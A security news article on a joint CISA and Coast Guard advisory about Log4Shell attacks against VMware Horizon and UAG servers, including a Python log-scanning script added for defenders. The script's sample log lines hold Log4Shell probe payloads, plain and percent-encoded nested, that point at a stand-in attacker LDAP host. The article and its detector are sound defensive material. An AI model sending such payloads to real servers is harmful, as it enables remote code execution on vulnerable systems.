US Agencies Warn Organizations of Log4Shell Attacks Against VMware Products

The United States Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER) have issued a joint advisory to warn organizations that threat actors continue to exploit the Log4Shell vulnerability in VMware Horizon and Unified Access Gateway (UAG) servers.

Tracked as CVE-2021-44228, the infamous Log4Shell vulnerability that was disclosed in November 2021 impacts the widely used Apache Log4j logging tool, and is described as a critical-severity flaw leading to remote code execution.

Exploitation of the vulnerability started less than two weeks after the bug was reported, prompting organizations to prioritize the deployment of available patches.

Since December 2021, numerous threat actors have been observed exploiting the vulnerability in VMware Horizon and UAG servers, including state-sponsored advanced persistent threat (APT) actors. VMware released fixes for this vulnerability in early December 2021.

Following successful exploitation, the adversaries deploy malicious loaders and eventually gain remote control of the compromised systems. In one attack, CISA and CGCYBER say, the threat actors managed to move laterally to a disaster recovery network and exfiltrated sensitive data.

The joint Cybersecurity Advisory (CSA) from CISA and CGCYBER provides details on the tactics, techniques, and procedures (TTPs) employed by threat actors in the observed attacks, along with incident response recommendations.

Attackers can exploit Log4Shell via specially crafted requests that will result in the execution of arbitrary code. Because of the bug, a broad range of consumer and enterprise applications, services, websites, and other products are exposed to potential attacks.
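On the defender's side, spotting these crafted requests in web server logs comes down to recognising the Log4j lookup syntax in request data, including when it arrives percent-encoded or split across nested lookups. The script below is an added example written for this article, not code from the CISA/CGCYBER advisory or from VMware: it normalizes a few constructed access-log lines (every IP address, hostname and path in it is invented) and reports the lines that carry a JNDI lookup.

```python
"""Flag HTTP access-log lines that carry a Log4j JNDI lookup (a Log4Shell probe).

Added illustration only; not code from the CISA/CGCYBER advisory or VMware.
All addresses, hostnames and paths below are constructed sample data.
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines. 203.0.113.0/24 and *.example are reserved
# documentation values; /portal/info.jsp is a made-up path.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [15/Jan/2022:10:01:02 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [15/Jan/2022:10:01:05 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.12 - - [15/Jan/2022:10:01:09 +0000] "GET /portal/info.jsp?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.13 - - [15/Jan/2022:10:01:12 +0000] "GET /portal/${date:yyyy} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# Innermost lookup: `${...}` whose body contains no further `$`, `{` or `}`.
# JNDI lookups are deliberately excluded so they survive normalization intact.
INNERMOST_LOOKUP = re.compile(r'\$\{(?!jndi:)([^${}]*)\}', re.IGNORECASE)
JNDI_LOOKUP = re.compile(r'\$\{jndi:[^}]*\}', re.IGNORECASE)


def resolve_lookup(body: str) -> str:
    """Evaluate one innermost Log4j lookup body far enough to expose its shape."""
    # Default-value syntax `${name:key:-default}`: the default is what Log4j
    # emits when the lookup itself resolves to nothing.
    if ':-' in body:
        return body.split(':-', 1)[1]
    name, _, arg = body.partition(':')
    name = name.lower()
    if name == 'lower':
        return arg.lower()
    if name == 'upper':
        return arg.upper()
    # Other lookups (date, env, sys, ...) are collapsed to an empty string; the
    # goal is to reveal a surrounding JNDI lookup, not to evaluate them.
    return ''


def percent_decode(text: str) -> str:
    """Percent-decode repeatedly so double-encoded payloads are unwrapped too."""
    while True:
        decoded = unquote(text)
        if decoded == text:
            return text
        text = decoded


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Decode and fold nested lookups until only JNDI lookups (if any) remain."""
    text = percent_decode(text)
    for _ in range(max_rounds):  # bounded: every round strips one nesting level
        folded = INNERMOST_LOOKUP.sub(lambda m: resolve_lookup(m.group(1)), text)
        if folded == text:
            break
        text = folded
    return text


def find_jndi_lookups(line: str) -> list:
    """Return the normalized JNDI lookups found in one log line ([] if none)."""
    return JNDI_LOOKUP.findall(normalize_lookups(line))


def scan_lines(lines) -> list:
    """Return (index, lookups) for each line that contains a JNDI lookup."""
    hits = []
    for idx, line in enumerate(lines):
        found = find_jndi_lookups(line)
        if found:
            hits.append((idx, found))
    return hits


if __name__ == "__main__":
    for idx, found in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {idx}: {found}")
```

Normalization runs before matching because a rule that looks for the literal `${jndi:` string misses the percent-encoded and nested forms in the sample; in a real deployment the function would be fed from the web or Horizon access logs rather than from the embedded list, and a hit is a reason to check the host against the patch level rather than proof of compromise on its own.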

During one of the observed attacks, the threat actors deployed a remote access tool that could log keystrokes, deploy and run payloads, and provide access to the compromised system’s desktop. Functioning as a command and control (C&C) tunneling proxy, the malware also allowed the attackers to move laterally.

While investigating the compromise of another victim, CISA discovered intrusions from multiple threat actors, some of which had access to the environment since late January 2022 or earlier. The attackers likely exploited Log4Shell in an unpatched VMware Horizon server for initial access.

Following initial access, the threat actors used PowerShell scripts to deploy additional payloads and moved laterally over the Remote Desktop Protocol (RDP), compromising multiple systems, including the victim’s disaster recovery network. They also deployed malware that gave them system monitoring, reverse shell access, payload delivery, and data exfiltration capabilities.

When identifying a potential breach, CISA and CGCYBER say, administrators should isolate the affected systems, collect and review logs and artifacts, engage with an incident response firm if necessary, and report the incident to CISA or the US Coast Guard (USCG) National Response Center (NRC).

To mitigate risks, organizations are advised to update their VMware Horizon and UAG systems so that they are patched against Log4Shell, and to treat unpatched systems as if they have already been compromised. Keeping all software up to date, applying network segmentation, implementing multi-factor authentication, and following best practices for identity and access management (IAM) should also reduce risk.

“Until the [VMware] update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible,” the CSA reads.

Related: Spring4Shell: Spring Flaws Lead to Confusion, Concerns of New Log4Shell-Like Threat

Related: Log4Shell-Like Vulnerability Found in Popular H2 Database

Related: Serious Vulnerabilities Found in AWS’s Log4Shell Hot Patches

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
